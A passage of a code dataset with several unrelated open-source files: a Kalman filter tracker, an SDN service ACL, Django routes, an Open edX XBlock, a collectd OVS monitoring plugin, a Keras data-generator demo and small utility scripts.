za[:, [j]] - hh[ii, :] * xx\n for r_i in range(0, 2):\n for r_j in range(0, 2):\n rr[ii[r_i], ii[r_j]] = r[r_i, r_j]\n kk = px * hh.T * np.linalg.inv(hh * px * hh.T + rr)\n xx = xx + kk * zz\n px = px - kk * hh * px\n \n for j in range(0, len_za):\n xx_cube[range(8 * id_za[j], 8 * id_za[j] + 8), :] = za_cube[:, range(3 * j, 3 * j + 3)]\n xx_class[id_za[j]] = za_class[j]\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n return\n \n def delete(self):\n \"\"\"Delete targets which are beyond the range of observation.\n \"\"\"\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n xx_mistracking = self.xx_mistracking\n xx_color_idx = self.xx_color_idx\n xtrue = self.xtrue\n max_tracking_times = self.max_tracking_times\n \n if xx.shape[1] == 0:\n return\n else:\n # Judge whether some target should be deleted for its mistracking.\n k = 0\n while k < int(xx.shape[0] / 4):\n if xx_mistracking[k] > max_tracking_times:\n len_xx = xx.shape[0]\n if len_xx == 4:\n xx = np.matrix([])\n px = np.matrix([])\n xx_cube = np.matrix([])\n xx_class = []\n xx_mistracking = []\n xx_color_idx = []\n break\n else:\n xx = np.delete(xx, range(4 * k, 4 * k + 4), axis=0)\n px = np.delete(px, range(4 * k, 4 * k + 4), axis=0)\n px = np.delete(px, range(4 * k, 4 * k + 4), axis=1)\n xx_cube = np.delete(xx_cube, range(8 * k, 8 * k + 8), axis=0)\n xx_class.pop(k)\n xx_mistracking.pop(k)\n xx_color_idx.pop(k)\n continue\n k += 1\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n \n self.xx_mistracking = xx_mistracking\n self.xx_color_idx = xx_color_idx\n return\n \n def pre_augment(self):\n \"\"\"Prepare for KF augment.\n aug contains velocity information which is obtained using two frames of location of the same target.\n \"\"\"\n 
\n zu = self.zu\n zu_cube = self.zu_cube\n zu_class = self.zu_class\n \n pre_aug = self.pre_aug\n pre_aug_cube = self.pre_aug_cube\n pre_aug_class = self.pre_aug_class\n \n self.aug = np.matrix([])\n self.aug_cube = np.matrix([])\n self.aug_class = []\n \n time_interval = self.time_interval\n gate_associate_person = self.gate_associate_person\n gate_associate_vehicle = self.gate_associate_vehicle\n \n aug = self.aug\n aug_cube = self.aug_cube\n aug_class = self.aug_class\n \n if zu.shape[1] == 0:\n return\n else:\n if pre_aug.shape[1] == 0:\n pre_aug = zu\n pre_aug_cube = zu_cube\n pre_aug_class = zu_class\n \n self.pre_aug = pre_aug\n self.pre_aug_cube = pre_aug_cube\n self.pre_aug_class = pre_aug_class\n \n self.aug = aug\n self.aug_cube = aug_cube\n self.aug_class = aug_class\n return\n else:\n for j in range(0, zu.shape[1]):\n if zu_class[j] == 'person':\n gate_associate = gate_associate_person\n elif zu_class[j] == 'car':\n gate_associate = gate_associate_vehicle\n pre_distance_m = float(\"inf\")\n pre_id_associate_best = float(\"inf\")\n for k in range(0, pre_aug.shape[1]):\n dd = (zu[0, j] - pre_aug[0, k]) ** 2 + (zu[1, j] - pre_aug[1, k]) ** 2\n pre_distance = math.sqrt(dd)\n if pre_distance < gate_associate and pre_distance < pre_distance_m:\n pre_distance_m = pre_distance\n pre_id_associate_best = k\n if pre_id_associate_best != float(\"inf\"):\n aug_new = np.matrix([[zu[0, j]],\n [(zu[0, j] - pre_aug[0, pre_id_associate_best]) / time_interval],\n [zu[1, j]],\n [(zu[1, j] - pre_aug[1, pre_id_associate_best]) / time_interval],])\n aug_cube_new = zu_cube[:, range(3 * j, 3 * j + 3)]\n aug_class_new = zu_class[j]\n if aug.shape[1] == 0:\n aug = aug_new\n aug_cube = aug_cube_new\n aug_class = [aug_class_new]\n else:\n aug = np.column_stack((aug, aug_new))\n aug_cube = np.column_stack((aug_cube, aug_cube_new))\n aug_class.append(aug_class_new)\n \n pre_aug = zu\n pre_aug_cube = zu_cube\n pre_aug_class = zu_class\n \n self.pre_aug = pre_aug\n self.pre_aug_cube = pre_aug_cube\n self.pre_aug_class = pre_aug_class\n \n self.aug = aug\n self.aug_cube = aug_cube\n self.aug_class = aug_class\n return\n \n def kf_augment(self):\n \"\"\"KF augment.\n \"\"\"\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n xx_mistracking = self.xx_mistracking\n xx_color_idx = self.xx_color_idx\n color_map = self.color_map\n \n aug = self.aug\n aug_cube = self.aug_cube\n aug_class = self.aug_class\n \n r = self.noise_r\n \n if aug.shape[1] == 0:\n return\n else:\n len_aug = aug.shape[1]\n for j in range(0, len_aug):\n xx_new = aug[:, j]\n xx_cube_new = aug_cube[:, range(3 * j, 3 * j + 3)]\n xx_class_new = aug_class[j]\n s = np.matrix([[1, 0],\n [0, 0],\n [0, 1],\n [0, 0],])\n px_new = s * r * s.T\n mistracking_new = 0\n color_idx_new = np.random.randint(1, len(color_map))\n \n # Augment xx.\n if xx.shape[1] == 0:\n xx = xx_new\n xx_cube = xx_cube_new\n xx_class = [xx_class_new]\n else:\n xx = np.row_stack((xx, xx_new))\n xx_cube = np.row_stack((xx_cube, xx_cube_new))\n xx_class.append(xx_class_new)\n \n # Augment px.\n if px.shape[1] == 0:\n px = px_new\n else:\n len_px = px.shape[1]\n ii = range(-4, 0)\n px = np.row_stack((px, np.zeros((4, len_px))))\n px = np.column_stack((px, np.zeros((len_px + 4, 4))))\n for p_i in range(0, 4):\n for p_j in range(0, 4):\n px[ii[p_i], ii[p_j]] = px_new[p_i, p_j]\n \n xx_mistracking.append(mistracking_new)\n xx_color_idx.append(color_idx_new)\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n \n 
self.xx_mistracking = xx_mistracking\n self.xx_color_idx = xx_color_idx\n return\n\n def kf_iterate(self, z, z_cube, z_class):\n self.kf_predict()\n self.increase_mistracking()\n self.associate(z, z_cube, z_class)\n self.kf_update()\n self.delete()\n self.pre_augment()\n self.kf_augment()\n\n","sub_path":"scripts/akf_tracker.py","file_name":"akf_tracker.py","file_ext":"py","file_size_in_byte":17831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"175725762","text":"import linecache\nimport logging\n\nfrom flowsieve.acl.acl_result import ACLResult, PacketMatch\nfrom flowsieve.acl.base_acl import BaseACL\nfrom flowsieve.acl.service_set import ServiceSet\n\nfrom ryu.lib.packet import ethernet, ipv4, tcp, udp\nfrom ryu.lib.packet.ether_types import ETH_TYPE_IP\nfrom ryu.lib.packet.in_proto import IPPROTO_TCP, IPPROTO_UDP\n\n\nclass ServiceACL(BaseACL):\n def __init__(self, **kwargs):\n super(ServiceACL, self).__init__(**kwargs)\n self.allowed_services = [s for s in [\n Service.from_str(s) for s in kwargs.get(\"allowed_services\", [])]\n if s is not None]\n self.denied_services = [s for s in [\n Service.from_str(s) for s in kwargs.get(\"denied_services\", [])]\n if s is not None]\n self.default = kwargs.get(\"service_default\", \"allow\")\n self.service_set = ServiceSet.empty()\n\n def load_relations(self, user_store):\n self.build_service_set()\n\n def build_service_set(self):\n self.service_set = ServiceSet.whole()\n\n default_str_low = self.default.lower()\n if default_str_low == \"deny\":\n self.service_set = ServiceSet.empty()\n elif default_str_low == \"allow\":\n self.service_set = ServiceSet.whole()\n elif default_str_low == \"inherit\" and self.parent is not None:\n self.parent.build_service_set()\n self.service_set = self.parent.service_set\n else:\n self._logger.warning(\"Unknown service_default value %s\",\n self.default)\n\n self.service_set += ServiceSet(services=self.allowed_services)\n self.service_set -= ServiceSet(services=self.denied_services)\n\n def allows_packet(self, pkt, src_user):\n if pkt is None:\n return ACLResult(src_user in self.service_set, PacketMatch())\n\n eth = pkt.get_protocol(ethernet.ethernet)\n iph = pkt.get_protocol(ipv4.ipv4)\n tcph = pkt.get_protocol(tcp.tcp)\n udph = pkt.get_protocol(udp.udp)\n\n # This is not a TCP/IP packet\n if iph is None:\n return ACLResult(True, PacketMatch(dl_type=eth.ethertype))\n elif tcph is None and udph is None:\n return ACLResult(True, PacketMatch(dl_type=ETH_TYPE_IP,\n nw_proto=iph.proto))\n\n match = PacketMatch(dl_type=ETH_TYPE_IP)\n\n if tcph is not None:\n service = Service(TP_PROTO_TCP, tcph.dst_port)\n match += PacketMatch(nw_proto=IPPROTO_TCP, tp_dst=service.port)\n elif udph is not None:\n service = Service(TP_PROTO_UDP, udph.dst_port)\n match += PacketMatch(nw_proto=IPPROTO_UDP, tp_dst=service.port)\n\n return ACLResult(service in self.service_set, match)\n\n def __repr__(self):\n return \"<ServiceACL allowed_services={} denied_services={}>\".format(\n self.allowed_services, self.denied_services\n )\n\n# Protocol alias\nTP_PROTO_TCP = 1\nTP_PROTO_UDP = 2\nPROTO_DDP = 3\nPROTO_SCTP = 4\n\n\nclass Service(object):\n ETC_SERVICE_FILE = \"/etc/services\"\n extracted_service = []\n extracted_port = []\n extracted_proto = []\n logger = logging.getLogger(__name__)\n service_file = []\n\n @classmethod\n def read_etc_service(cls):\n if cls.service_file != []:\n return\n try:\n cls.service_file = linecache.getlines(cls.ETC_SERVICE_FILE)\n cls.logger.debug(\"Service_file is ready\")\n cls.parse_file()\n except 
IOError:\n cls.logger.error(\"Could not open %s\" % cls.ETC_SERVICE_FILE)\n return None\n\n @classmethod\n def parse_file(cls):\n import re\n for line in cls.service_file:\n if line[0].isalpha():\n # ignore blank line and comment\n remove_comment = line.split(\"#\")[0]\n # discard inline comment\n splitted_line = re.split(\" |\\t|\\n\", remove_comment)\n # split the line on spaces, tabs and newlines\n for each in splitted_line:\n if each != \"\":\n if len(each.split(\"/\")) == 1:\n # no '/' in the token, so it is a service name\n cls.extracted_service.append(each)\n elif len(each.split(\"/\")) == 2:\n # one '/' found, so the token should be port/proto\n if each.split(\"/\")[0].isdigit():\n # got a valid port; the protocol check is\n # kept in a separate if for readability\n if each.split(\"/\")[1] in [\n \"tcp\", \"udp\",\n \"ddp\", \"sctp\"]:\n cls.extracted_port.append(\n int(each.split(\"/\")[0]))\n cls.extracted_proto.append(\n cls.proto_to_int(each.split(\"/\")[1]))\n else:\n cls.logger.warning(\n \"Protocol %s is unknown\" %\n each.split(\"/\")[1])\n else:\n cls.logger.warning(\n \"Port number %s is unknown\" %\n each.split(\"/\")[0])\n break\n else:\n # more than one '/', so the token is malformed\n cls.logger.warning(\n \"Token %s is malformed\" %\n each)\n return cls.service_file\n\n @classmethod\n def proto_to_int(cls, each):\n if each == \"tcp\":\n return TP_PROTO_TCP\n if each == \"udp\":\n return TP_PROTO_UDP\n if each == \"ddp\":\n return PROTO_DDP\n if each == \"sctp\":\n return PROTO_SCTP\n else:\n cls.logger.warning(\n \"Protocol %s is unknown\" % each)\n\n @classmethod # deal with proto ddp & sctp\n def map_ddp_sctp_by_port(cls, port, proto): # find proto first, then port\n if proto in cls.extracted_proto: # because they overlap some\n if proto == PROTO_DDP: # ports with TCP & UDP\n service_index = cls.extracted_proto.index(PROTO_DDP)\n else:\n service_index = cls.extracted_proto.index(PROTO_SCTP)\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n while service_index < len(cls.extracted_service):\n if cls.extracted_proto[service_index] == proto:\n if cls.extracted_port[service_index] == port:\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n\n @classmethod\n def map_ddp_sctp_by_service(cls, service, proto): # deal with ddp & sctp\n if proto in cls.extracted_proto: # like the method above\n if proto == PROTO_DDP:\n service_index = cls.extracted_proto.index(PROTO_DDP)\n else:\n service_index = cls.extracted_proto.index(PROTO_SCTP)\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n while service_index < len(cls.extracted_service):\n if cls.extracted_proto[service_index] == proto:\n if cls.extracted_service[service_index] == service:\n port = cls.extracted_port[service_index]\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n\n @classmethod\n def map_by_port(cls, port, proto): # find port first, then match proto\n if port in cls.extracted_port:\n service_index = cls.extracted_port.index(port)\n while service_index < len(cls.extracted_service):\n if cls.extracted_port[service_index] == port:\n if cls.extracted_proto[service_index] == proto:\n return Service(proto, port)\n else:\n service_index += 1\n else:\n 
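# entries for this port ran out before the protocol matched\n 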
cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n\n @classmethod\n def map_by_service(cls, service, proto): # find service first,\n if service in cls.extracted_service: # then match proto\n service_index = cls.extracted_service.index(service)\n while service_index < len(cls.extracted_service):\n if cls.extracted_service[service_index] == service:\n if cls.extracted_proto[service_index] == proto:\n port = cls.extracted_port[service_index]\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n\n @classmethod\n def from_str(cls, s):\n if s is None:\n cls.logger.warning(\"Cannot parse None\")\n return None\n splitted = s.split(\"/\")\n if len(splitted) != 2:\n cls.logger.warning(\"Service definition [%s] is malformed\", s)\n return None\n proto = splitted[0].lower()\n proto = cls.proto_to_int(proto)\n port_or_service = splitted[1]\n if proto in [PROTO_DDP, PROTO_SCTP]:\n if port_or_service.isdigit():\n port = int(port_or_service)\n return cls.map_ddp_sctp_by_port(port, proto)\n else:\n service = str(port_or_service)\n return cls.map_ddp_sctp_by_service(service, proto)\n elif proto in [TP_PROTO_TCP, TP_PROTO_UDP]:\n if port_or_service.isdigit():\n port = int(port_or_service)\n return cls.map_by_port(port, proto)\n else:\n service = str(port_or_service)\n return cls.map_by_service(service, proto)\n else:\n cls.logger.warning(\"Service protocol [%s] is unknown\", proto)\n return None\n\n def __init__(self, proto, port):\n self.proto = proto\n self.port = port\n\n def __eq__(self, other):\n return self.proto == other.proto and self.port == other.port\n\n def __hash__(self):\n return hash((self.proto, self.port))\n\n def __repr__(self):\n return \"<Service proto={} port={}>\".format(self.proto, self.port)\n","sub_path":"flowsieve/acl/service_acl.py","file_name":"service_acl.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"2391581","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.list_all, name='index'),\n url(r'^create', views.create_event, name='create'),\n url(r'^(?P<event_id>[0-9]+)', views.view_event_details, name='detail'),\n url(r'^register/(?P<event_id>[0-9]+)', views.register_user, name='register'),\n url(r'^adminlist/(?P<event_id>[0-9]+)', views.view_admin_panel, name='adminlist'),\n url(r'^adminlist/paymentstatus/(?P<registration_id>[0-9]+)', views.change_payment_status, name='payment_status'),\n url(r'^delete/(?P<event_id>[0-9]+)', views.delete_event, name='event_id'),\n url(r'^delete/', views.list_with_delete, name='delete'),\n\n]\n","sub_path":"chemie/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"384627385","text":"# -*- coding: utf-8 -*- \n\nfrom xblock.core import XBlock\nfrom xblock.fields import Scope, Dict, String\nfrom xblock.fragment import Fragment\nfrom .utils import render_template, load_resource,\\\n get_words_in_groups, convert_key_dict, compute_hash\n\n\nclass InputOverPicture(XBlock):\n \"\"\"\n Mechanism for working with a text and typing key words over pictures.\n \"\"\"\n display_name = String(\n display_name = \"Title\",\n scope = Scope.settings,\n default = \"Task of input words over picture.\"\n )\n\n RU_CONDITION = String(\n default=\"17. Прочитайте текст и сделайте подписи к картинкам. Расставьте слова:\\\n 1) родственные отношения; 2) род занятий.\",\n scope = Scope.content\n )\n\n TU_CONDITION = String(\n default=\"Aşağıdaki parçayı okuyunuz ve resimlerin altına yazınız:\\\n 1. akrabalık ilişkileri.\\\n 2. meslek.\",\n scope = Scope.content\n )\n\n text = String(\n default='',\n scope=Scope.content,\n help='text that users will work with'\n )\n\n first = Dict(\n default=None, \n scope=Scope.content,\n help=\"Example - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, etc.\"\n )\n\n second = Dict(\n default=None, \n scope=Scope.content,\n help=\"Example - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, etc.\"\n )\n\n third = Dict(\n default=None, \n scope=Scope.content,\n help=\"Example - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, etc.\"\n )\n\n fourth = Dict(\n default=None, \n scope=Scope.content,\n help=\"Example - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, etc.\"\n )\n\n\n def student_view(self, context=None):\n \"\"\"\n The primary view of the InputOverPicture, shown to students\n when viewing courses.\n \"\"\"\n context = {\n 'RU_CONDITION' : self.RU_CONDITION,\n 'TU_CONDITION' : self.TU_CONDITION,\n }\n \n data = [self.first, self.second, self.third, self.fourth]\n data = get_words_in_groups(data)\n\n if self.first:\n context['text'] = self.text\n context['first'] = data[2][0]\n context['second'] = data[2][1]\n context['third'] = data[2][2]\n context['fourth'] = data[2][3]\n context['words1'] = data[0]\n context['words2'] = data[1]\n\n html = render_template(\"static/html/input_over_picture.html\", context)\n frag = Fragment(html)\n frag.add_css(load_resource(\"static/css/input_over_picture.css\"))\n frag.add_javascript(load_resource(\"static/js/src/input_over_picture.js\"))\n frag.initialize_js('InputOverPicture')\n\n return frag\n\n\n def studio_view(self, context=None):\n \"\"\"\n Get template for editing.\n \"\"\"\n html = render_template(\"static/html/studio.html\")\n frag = Fragment(html)\n frag.add_javascript(load_resource(\"static/js/src/studio.js\"))\n 
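# 'StudioEdit' is the client-side JS class bound to this fragment; it\n # presumably posts the edited fields back through set_data_from_studio below.\n 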
frag.initialize_js('StudioEdit')\n\n return frag\n\n\n @XBlock.json_handler\n def set_data_from_studio(self, data, suffix=''):\n \"\"\"\n Called when submitting the form in Studio.\n \"\"\"\n self.text = data.get('text')\n self.first = convert_key_dict(data['first'])\n self.second = convert_key_dict(data['second'])\n self.third = convert_key_dict(data['third'])\n self.fourth = convert_key_dict(data['fourth'])\n\n return {'result': 'success'}\n\n\n @XBlock.json_handler\n def get_data_for_studio(self, data, suffix=''):\n return {\n 'text': self.text,\n 'first': self.first,\n 'second': self.second,\n 'third': self.third,\n 'fourth': self.fourth,\n }\n\n\n @XBlock.json_handler\n def check_word(self, data, suffix=''):\n \"\"\"\n Check whether the submitted word matches the given picture.\n \"\"\"\n result = dict()\n array_d = [self.first, self.second, self.third, self.fourth]\n check_w = data['word']\n key = compute_hash(data['pic_src'])\n result['result'] = False\n\n index = data['wrap'].split('_')\n index = int(index[1])-1\n words = array_d[index][key]\n\n if check_w == words[0] or check_w == words[1]:\n result['result'] = True\n result['key'] = words[0] + '_' + words[1] + data['tag']\n\n return result","sub_path":"input_over_picture/input_over_picture/input_over_picture.py","file_name":"input_over_picture.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"594659054","text":"#!/usr/bin/env python\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\n\"\"\"\n\nimport collectd\nimport os\nimport subprocess\nimport time\n\ndef configure(cfg):\n global INTERVAL\n global interfaces\n global namespaces\n interfaces = []\n namespaces = []\n config = {c.key: c.values for c in cfg.children}\n INTERVAL = config['interval'][0]\n collectd.register_read(read, INTERVAL)\n if 'interfaces' in config:\n interfaces = config['interfaces']\n if 'namespaces' in config :\n namespaces = config['namespaces']\n\ndef run_command(command):\n output = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE)\n return output.communicate()\n\ndef read(data=None):\n starttime = time.time()\n ifs = []\n ns = []\n if len(interfaces) > 0 :\n collectd.debug(\"Interfaces : {}\".format(interfaces))\n for interface in interfaces :\n ifs.append({interface: run_command(\"ovs-vsctl show | grep 'Port \\\\\\"{}' | wc -l\".format(interface))[0].replace(\"\\n\",\"\")})\n if len(namespaces) > 0 :\n collectd.debug(\"Namespaces : {}\".format(namespaces))\n for namespace in namespaces :\n ns.append({namespace: run_command(\"sudo ip netns | grep {} | wc -l\".format(namespace))[0].replace(\"\\n\",\"\")})\n if len(ifs) > 0 :\n for i in ifs :\n for value in i:\n metric = collectd.Values()\n metric.plugin = 'ovsagent_monitoring'\n metric.interval = INTERVAL\n metric.type = 'gauge'\n metric.type_instance = \"{}_interface_total-count\".format(value)\n metric.values = [i[value]]\n metric.dispatch()\n\n if len(ns) > 0 :\n for n in ns :\n for value in n:\n 
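# One gauge per namespace, mirroring the interface loop above.\n 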
metric = collectd.Values()\n metric.plugin = 'ovsagent_monitoring'\n metric.interval = INTERVAL\n metric.type = 'gauge'\n metric.type_instance = \"{}_ns_total-count\".format(value)\n metric.values = [n[value]]\n metric.dispatch()\n\n timediff = time.time() - starttime\n if timediff > INTERVAL:\n collectd.warning(\n 'ovsagent_monitoring: Took: {} > {}'.format(\n round(timediff, 2),\n INTERVAL)\n )\n\ncollectd.register_config(configure)\n","sub_path":"ansible/install/roles/collectd-openstack/files/collectd_ovsagent.py","file_name":"collectd_ovsagent.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"64128009","text":"import csv\r\nimport json\r\n\r\n\r\ndef get_data(filepath):\r\n datas = []\r\n with open(filepath) as f:\r\n csv_book = csv.reader(f)\r\n for row in list(csv_book)[1:-1]:\r\n if row[1] != '':\r\n datas.append(row)\r\n return datas\r\n\r\n\r\ndef write_json(filepath, data):\r\n with open(filepath,'a') as f:\r\n f.write('[')\r\n for i in range(len(data)):\r\n tmp_str = '{\\n\"spo_list\": {\\n\\t\"subject_type\": \"' + data[i][2] + '\",\\n\\t\"subject\": \"' + data[i][1] \\\r\n + '\",\\n\\t\"predicate\": \"' + data[i][5] + '\",\\n\\t\"object_type\": \"'+data[i][4] + '\",\\n\\t\"object\": \"' \\\r\n + data[i][3].replace('\"',\"'\") + '\"\\n}\\n},\\n'\r\n if i == len(data)-1:\r\n tmp_str=tmp_str[:-2]\r\n f.write(tmp_str)\r\n f.write(']')\r\n\r\nfilepath = 'D:\\\\ICE实验室\\\\sample(搜狐军事兵器解析).csv' # path to the source CSV file\r\njsonfile = 'D:\\\\ICE实验室\\\\tmpjson.json' # path of the generated JSON file\r\n# datas = get_data(filepath)\r\n# write_json(jsonfile, datas)\r\n\r\nwith open(jsonfile,'r') as f:\r\n data=json.load(f) # load the saved JSON\r\n entity_tmp_array = []\r\n entity_array=[]\r\n data_dict={}\r\n for row in data:\r\n tmp_dict={}\r\n entity_tmp_array.append(row['spo_list']['subject']) # collect entity names\r\n tmp_dict['predicate'] = row['spo_list']['predicate']\r\n tmp_dict['object'] = row['spo_list']['object']\r\n data_dict[row['spo_list']['subject']]=tmp_dict\r\n entity_tmp_array=list(set(entity_tmp_array))\r\nprint(data)\r\n\r\n","sub_path":"demo/demo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"400200011","text":"def div(n):\n ans = 0\n while n % 2 == 0:\n n /= 2\n ans += 1\n return ans\n\n\nn = int(input())\na = map(int, input().split())\nans = min(map(div, a))\nprint(ans)\n","sub_path":"python/abc081b.py","file_name":"abc081b.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"438587668","text":"'''\nA demo for running Keras inference on a database, and recording some results.\n'''\n\nimport numpy as np\nimport cv2 # Used to resize objects to the same size.\nimport tensorflow as tf\n\nfrom shuffler.utils import testing as testing_utils\nfrom shuffler.interface.keras import generators\n\n\ndef make_model(input_shape, num_classes):\n ''' Make a simple two-layer convolutional model. 
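Layers: Input -> Conv2D(32, 3x3, relu) -> MaxPool(2x2) -> Conv2D(64, 3x3, relu)\n -> MaxPool(2x2) -> Flatten -> Dropout(0.5) -> Dense(num_classes, softmax).\n 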
'''\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=input_shape),\n tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.5),\n tf.keras.layers.Dense(num_classes, activation=\"softmax\"),\n ])\n model.summary()\n return model\n\n\ndef main():\n # This database contains 3 images with 2 cars and 1 bus.\n in_db_file = testing_utils.Test_carsDb.CARS_DB_PATH\n rootdir = testing_utils.Test_carsDb.CARS_DB_ROOTDIR\n\n # Objects are resized to this shape.\n width = 100\n height = 100\n\n # The transform resizes every image, and makes the label categorical.\n transform_group = {\n 'image': lambda x: cv2.resize(x, (width, height)),\n 'name': lambda x: 1 if x == 'bus' else 0\n }\n\n # Make a generator of OBJECTS. Every returned item is an object in the db.\n generator = generators.ObjectGenerator(in_db_file,\n rootdir=rootdir,\n used_keys=['image', 'name'],\n transform_group=transform_group,\n batch_size=2,\n shuffle=False)\n\n model = make_model(input_shape=(height, width, 3), num_classes=2)\n model.compile(loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n epochs = 10\n model.fit(generator, epochs=epochs, workers=1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"shuffler/interface/keras/generators_demo.py","file_name":"generators_demo.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503373674","text":"#!/usr/bin/python\n\nimport hostGroups\n\n\nmask=\"\"\"\ndefine host {\n use generic-host\n name Ajour_%s\n host_name %s.ajoursystem.dk\n hostgroups ajour_web_systems, ajour_email_systems, %s\n check_command check_dummy\n}\n\"\"\"\n\n\ndef doAll():\n hosts = hostGroups.Hosts()\n hosts.buildHostsFromConsul() \n\n for host_key, host in hosts.hosts.items():\n for site in host.sites:\n\n #site='ai'\n #host='a8'\n exp = mask % (site.sitekey, site.sitekey, host.hostname)\n print(exp)\n\n\n\ndoAll()\n","sub_path":"hostlist_icinga/build_host_defs.py","file_name":"build_host_defs.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161086828","text":"from couchdbkit import ResourceNotFound\nfrom couchdbkit.ext.django import schema\nimport datetime\nfrom dimagi.utils.parsing import json_format_date\nfrom pillowtop.listener import BasicPillow\n\n\ndef date_emitter(fn):\n fn._fluff_emitter = 'date'\n return fn\n\n\ndef null_emitter(fn):\n fn._fluff_emitter = 'null'\n return fn\n\n\ndef filter_by(fn):\n fn._fluff_filter = True\n return fn\n\n\nclass CalculatorMeta(type):\n _counter = 0\n\n def __new__(mcs, name, bases, attrs):\n emitters = set()\n filters = set()\n parents = [p for p in bases if isinstance(p, CalculatorMeta)]\n for attr in attrs:\n if getattr(attrs[attr], '_fluff_emitter', None):\n emitters.add(attr)\n if getattr(attrs[attr], '_fluff_filter', False):\n filters.add(attr)\n\n # needs to inherit emitters and filters from all parents\n for parent in parents:\n emitters.update(parent._fluff_emitters)\n filters.update(parent._fluff_filters)\n\n cls = super(CalculatorMeta, mcs).__new__(mcs, name, bases, attrs)\n cls._fluff_emitters = emitters\n cls._fluff_filters = filters\n cls._counter = mcs._counter\n 
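# _counter stamps each Calculator subclass with its definition-order index.\n 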
mcs._counter += 1\n return cls\n\n\nclass Calculator(object):\n __metaclass__ = CalculatorMeta\n\n window = None\n\n def __init__(self, window=None):\n if window is not None:\n self.window = window\n if not isinstance(self.window, datetime.timedelta):\n # if window is set to None, for instance\n # fail here and not whenever that's run into below\n raise NotImplementedError(\n 'window must be timedelta, not %s' % type(self.window))\n\n def filter(self, item):\n return True\n\n def to_python(self, value):\n return value\n\n def calculate(self, item):\n passes_filter = self.filter(item) and all(\n (getattr(self, slug)(item) for slug in self._fluff_filters)\n )\n values = {}\n for slug in self._fluff_emitters:\n values[slug] = (\n list(getattr(self, slug)(item))\n if passes_filter else []\n )\n return values\n\n\n\nclass IndicatorDocumentMeta(schema.DocumentMeta):\n\n def __new__(mcs, name, bases, attrs):\n calculators = {}\n for attr_name, attr_value in attrs.items():\n if isinstance(attr_value, Calculator):\n calculators[attr_name] = attr_value\n attrs[attr_name] = schema.DictProperty()\n cls = super(IndicatorDocumentMeta, mcs).__new__(mcs, name, bases, attrs)\n if not hasattr(cls, '_calculators'):\n cls._calculators = {}\n cls._calculators.update(calculators)\n return cls\n\n\nclass IndicatorDocument(schema.Document):\n\n __metaclass__ = IndicatorDocumentMeta\n base_doc = 'IndicatorDocument'\n\n document_class = None\n group_by = ()\n\n def calculate(self, item):\n for attr, calculator in self._calculators.items():\n self[attr] = calculator.calculate(item)\n self.id = item.get_id\n for attr in self.group_by:\n self[attr] = item[attr]\n # overwrite whatever's in group_by with the default\n self['group_by'] = type(self)().group_by\n\n @classmethod\n def 